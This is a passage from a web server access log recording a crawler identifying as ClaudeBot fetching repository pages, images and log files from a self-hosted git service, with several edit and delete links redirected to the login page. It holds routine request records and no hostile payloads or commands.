[Length 10916] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10917] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64?display=rendered" [Client 216.73.216.188] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom1.png" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fnpm%2Fdata%2Fnginx%2Fproxy_host%2F2.conf" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 216.73.216.188] [Length 10999] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages/DCS.html?display=rendered" [Client 216.73.216.188] [Length 10926] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 216.73.216.188] [Length 11030] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/ControlRoom6.png" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/Services.tsx?display=rendered" [Client 216.73.216.188] [Length 10918] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 216.73.216.188] [Length 11022] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.fish" [Client 216.73.216.188] [Length 2221] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fpages%2FDCS.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9790] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 840] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" [Client 216.73.216.188] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:41 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12?display=rendered" [Client 216.73.216.188] [Length 11030] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/ControlRoom1.png" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_http_access.log" [Client 216.73.216.188] [Length 1948] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/app/database.py?display=source" [Client 216.73.216.188] [Length 12340] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/proxy-host-2_error.log?display=source" [Client 216.73.216.188] [Length 14639] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/database.py?display=source" [Client 216.73.216.188] [Length 12345] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 14851] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 10068] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log?display=source" [Client 216.73.216.188] [Length 20826] [Gzip 6.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 1442] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log?display=rendered" [Client 216.73.216.188] [Length 11189] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15583] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/npm/data/logs/fallback_error.log" [Client 216.73.216.188] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-1_access.log" -[15/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log?display=source" [Client 216.73.216.188] [Length 11626] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/css" [Client 216.73.216.188] [Length 10112] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-1_access.log" -[15/Feb/2026:13:23:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-4_access.log" -[15/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-3_access.log" -[15/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/assets/js/script.js" [Client 216.73.216.188] [Length 15618] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/include" [Client 216.73.216.188] [Length 10314] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/npm/data/logs/letsencrypt-requests_access.log" -[15/Feb/2026:13:23:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-4_access.log" -[15/Feb/2026:13:23:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/proxy-host-3_access.log" -[15/Feb/2026:13:23:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/npm/data/logs/proxy-host-2_access.log" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/npm/data/logs/letsencrypt-requests_access.log" -[15/Feb/2026:13:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr 